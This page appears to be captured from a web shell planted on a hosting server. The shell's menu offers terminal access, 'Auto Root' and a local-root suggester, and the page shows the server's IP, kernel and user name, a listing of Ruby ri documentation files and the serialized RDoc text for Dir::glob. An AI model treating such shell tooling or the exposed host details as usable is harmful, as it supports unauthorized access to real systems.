Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Dir /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d-c.ri
378
B
-rw-r--r--
2023-07-26 17:38
cdesc-Dir.ri
1.61
KB
-rw-r--r--
2023-07-26 17:38
chdir-c.ri
1.59
KB
-rw-r--r--
2023-07-26 17:38
chroot-c.ri
501
B
-rw-r--r--
2023-07-26 17:38
close-i.ri
506
B
-rw-r--r--
2023-07-26 17:38
delete-c.ri
450
B
-rw-r--r--
2023-07-26 17:38
each-i.ri
781
B
-rw-r--r--
2023-07-26 17:38
entries-c.ri
598
B
-rw-r--r--
2023-07-26 17:38
exist%3f-c.ri
439
B
-rw-r--r--
2023-07-26 17:38
exists%3f-c.ri
441
B
-rw-r--r--
2023-07-26 17:38
foreach-c.ri
813
B
-rw-r--r--
2023-07-26 17:38
getwd-c.ri
514
B
-rw-r--r--
2023-07-26 17:38
glob-c.ri
3.72
KB
-rw-r--r--
2023-07-26 17:38
home-c.ri
399
B
-rw-r--r--
2023-07-26 17:38
inspect-i.ri
322
B
-rw-r--r--
2023-07-26 17:38
mkdir-c.ri
844
B
-rw-r--r--
2023-07-26 17:38
mktmpdir-c.ri
2.24
KB
-rw-r--r--
2023-07-26 17:38
new-c.ri
342
B
-rw-r--r--
2023-07-26 17:38
open-c.ri
605
B
-rw-r--r--
2023-07-26 17:38
path-i.ri
457
B
-rw-r--r--
2023-07-26 17:38
pos%3d-i.ri
680
B
-rw-r--r--
2023-07-26 17:38
pos-i.ri
537
B
-rw-r--r--
2023-07-26 17:38
pwd-c.ri
510
B
-rw-r--r--
2023-07-26 17:38
read-i.ri
577
B
-rw-r--r--
2023-07-26 17:38
rewind-i.ri
505
B
-rw-r--r--
2023-07-26 17:38
rmdir-c.ri
448
B
-rw-r--r--
2023-07-26 17:38
seek-i.ri
735
B
-rw-r--r--
2023-07-26 17:38
tell-i.ri
539
B
-rw-r--r--
2023-07-26 17:38
tmpdir-c.ri
309
B
-rw-r--r--
2023-07-26 17:38
to_path-i.ri
463
B
-rw-r--r--
2023-07-26 17:38
unlink-c.ri
450
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI" glob:ETI"Dir::glob;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"FReturns the filenames found by expanding <i>pattern</i> which is ;TI"Fan +Array+ of the patterns or the pattern +String+, either as an ;TI"H<i>array</i> or as parameters to the block. Note that this pattern ;TI"8is not a regexp (it's closer to a shell glob). See ;TI"D<code>File::fnmatch</code> for the meaning of the <i>flags</i> ;TI"Fparameter. Note that case sensitivity depends on your system (so ;TI"D<code>File::FNM_CASEFOLD</code> is ignored), as does the order ;TI"'in which the results are returned.;To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@label[I"<code>*</code>;T; [o; ; [I",Matches any file. Can be restricted by ;TI".other values in the glob. <code>*</code> ;TI"0will match all files; <code>c*</code> will ;TI"$match all files beginning with ;TI"0<code>c</code>; <code>*c</code> will match ;TI"/all files ending with <code>c</code>; and ;TI"2<code>\*c\*</code> will match all files that ;TI"/have <code>c</code> in them (including at ;TI"*the beginning or end). Equivalent to ;TI"0<code>/ .* /x</code> in regexp. Note, this ;TI"7will not match Unix-like hidden files (dotfiles). ;TI"5In order to include those in the match results, ;TI"7you must use something like <code>"{*,.*}"</code>.;To;;[I"<code>**</code>;T; [o; ; [I"%Matches directories recursively.;To;;[I"<code>?</code>;T; [o; ; [I".Matches any one character. Equivalent to ;TI"#<code>/.{1}/</code> in regexp.;To;;[I"<code>[set]</code>;T; [o; ; [ I")Matches any one character in +set+. ;TI",Behaves exactly like character sets in ;TI"$Regexp, including set negation ;TI"(<code>[^a-z]</code>).;To;;[I"<code>{p,q}</code>;T; [o; ; [I".Matches either literal <code>p</code> or ;TI"/literal <code>q</code>. Matching literals ;TI"/may be more than one character in length. ;TI".More than two literals may be specified. ;TI"*Equivalent to pattern alternation in ;TI"regexp.;To;;[I"<code> \\ </code>;T; [o; ; [ I"%Escapes the next metacharacter. ;TI"3Note that this means you cannot use backslash ;TI"#in windows as part of a glob, ;TI"6i.e. <code>Dir["c:\\foo*"]</code> will not work, ;TI"-use <code>Dir["c:/foo*"]</code> instead.;T@o:RDoc::Markup::Verbatim; [I":Dir["config.?"] #=> ["config.h"] ;TI":Dir.glob("config.?") #=> ["config.h"] ;TI"9Dir.glob("*.[a-z][a-z]") #=> ["main.rb"] ;TI":Dir.glob("*.[^r]*") #=> ["config.h"] ;TI"EDir.glob("*.{rb,h}") #=> ["main.rb", "config.h"] ;TI"EDir.glob("*") #=> ["config.h", "main.rb"] ;TI"PDir.glob("*", File::FNM_DOTMATCH) #=> [".", "..", "config.h", "main.rb"] ;TI" ;TI"'rbfiles = File.join("**", "*.rb") ;TI"9Dir.glob(rbfiles) #=> ["main.rb", ;TI"= # "lib/song.rb", ;TI"E # "lib/song/karaoke.rb"] ;TI"&libdirs = File.join("**", "lib") ;TI"5Dir.glob(libdirs) #=> ["lib"] ;TI" ;TI"7librbfiles = File.join("**", "lib", "**", "*.rb") ;TI"=Dir.glob(librbfiles) #=> ["lib/song.rb", ;TI"E # "lib/song/karaoke.rb"] ;TI" ;TI"1librbfiles = File.join("**", "lib", "*.rb") ;TI"<Dir.glob(librbfiles) #=> ["lib/song.rb"];T:@format0: @fileI" dir.c;T:0@omit_headings_from_table_of_contents_below0I"fDir.glob( pattern, [flags] ) -> array Dir.glob( pattern, [flags] ) {| filename | block } -> nil ;T0[ I"(p1, p2 = v2);T@rFI"Dir;TcRDoc::NormalClass0